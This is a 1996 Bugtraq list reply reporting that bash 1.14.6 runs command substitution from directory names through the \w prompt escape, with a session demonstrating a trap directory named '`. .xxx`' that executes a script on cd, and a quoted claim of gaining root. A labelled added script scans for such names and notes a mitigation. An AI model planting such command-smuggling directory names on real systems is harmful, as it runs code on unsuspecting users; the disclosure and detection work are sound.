[3371] in bugtraq


Re: tee see shell problems

daemon@ATHENA.MIT.EDU (Oleg Girko)
Tue Sep 17 11:54:30 1996

Date: 	Tue, 17 Sep 1996 14:47:29 +0400
Reply-To: Oleg Girko <ol@niif.ru>
From: Oleg Girko <ol@niif.ru>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
In-Reply-To:  <m1bloea2ror.fsf@blackbird.mitre.org>

Hello people!

On Mon, 16 Sep 1996, David S. Goldberg wrote:

> > I just tested a variation of this exploit with bash 1.14.6(1)
> > running on Linux 2.0.13.  By using my variation I managed to become
> > root. I find this frightening.  In my variation I wasn't as subtle.
> > To use a large portion of the original exploit.  Hopefully things
> > like this won't happen, but it is possible.  I know that I will
> > forever be much more careful when cd'ing from now on.  This is a
> > very simplistic example, but I am sure more difficult ones can be
> > devised.
>
> I tried the same with bash 1.14.6(1) on Solaris 2.5 (sparc, though
> theoretically it shouldn't matter), SunOS 4.1.4, BSDI 2.0.1 and IRIX
> 5.3, and was unable to perform the exploit using the * wildcard
> expansion (if I typed in the directory name with the backquotes
> directly, it did work, which I would expect).  I ran bash under truss
> (on Solaris) and sure enough, the backquote expansion is simply not
> done.  The * expansion generates the backquoted file name, which is
> passed to chdir.  I was able to perform this exploit with tcsh 6.05 on
> all the above platforms, but not with tcsh 6.04.  I don't know why it
> worked for bash under Linux, but I don't have a Linux box available to
> me to check it out.

There is a problem with \w substitution in the command prompt. Look at this:

ol@snark:~ (0/286) cd /tmp
ol@snark:/tmp (0/287) echo $PS1
\u@\h:\w (0/\!)
ol@snark:/tmp (0/288) mkdir '`. .xxx`'
ol@snark:/tmp (0/289) cat > '`. .xxx`'/.xxx
#!/bin/sh

echo 'YOU LOOSE!!!'

ol@snark:/tmp (0/290) cd '`. .xxx`'
ol@snark:/tmp/YOU LOOSE!!! (0/291) echo $BASH_VERSION
1.14.6(1)
ol@snark:/tmp/YOU LOOSE!!! (0/292) uname -a
SunOS snark 5.5 Generic sun4m sparc SUNW,SPARCstation-20
ol@snark:/tmp/YOU LOOSE!!! (0/293)
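An added example, not part of Oleg Girko's post: a POSIX shell check that lists directory names an unquoted \w in PS1 could hand to command substitution (as in the session above), built on a constructed demo tree, with the bash option that stops the re-expansion noted in a comment. The helper names are hypothetical.

```shell
#!/bin/sh
# Added example (not from the original post). Directory names containing a
# backquote or "$(" are the ones a prompt's \w expansion could feed to
# command substitution. Helper names here are hypothetical.

# List directories under $1 whose names contain ` or $(.
find_prompt_hazards() {
    find "$1" -type d \( -name '*`*' -o -name '*$(*' \) 2>/dev/null
}

# Count such directories (prints a single number).
count_prompt_hazards() {
    find_prompt_hazards "$1" | wc -l | tr -d ' '
}

# Build a constructed demo tree in a fresh temp dir: two harmless names and
# two that a prompt could misinterpret. Prints the root path.
make_demo_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/docs" "$root/build"
    mkdir "$root/"'`. .xxx`'       # the name from the post, single-quoted
    mkdir "$root/build/"'$(id)'    # the $(...) spelling of the same idea
    printf '%s\n' "$root"
}

# Mitigation in later bash releases (not the 1.14.6 shown above): with
# promptvars turned off, the prompt string is not re-expanded after \w is
# filled in, so a directory name is displayed literally:
#   shopt -u promptvars

if [ "${1:-}" = "--demo" ]; then
    root=$(make_demo_tree)
    echo "Directory names under $root that a prompt could misinterpret:"
    find_prompt_hazards "$root"
    rm -rf "$root"
fi
```

Run the script with `--demo` to see the two flagged names; point `find_prompt_hazards` at a real tree to audit it.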

  __
 /  )/  Oleg Girko, sys admin in SPb Univ. Physics Inst. Comp. Centre
(__/(_, Email: ol@niif.spb.su               Phone: +7 (812) 428 45 27
        http://www.niif.spb.su/~ol/  In some MUDS is known as Luarvic
GCM/CS  d--(x) H++ s:+> !g p?(3) !au>* a25 w(+) v C++ UB++++$ UL++++$
        UU++++$ US++++$ P+ L+ 3++>+++ E N+ K- W-- M-- V- -po+ Y !t !5
        !j R G? !tv b+>++ D+ B? e++ u+ h- f+ r->+++ n+ y+(-)>+++
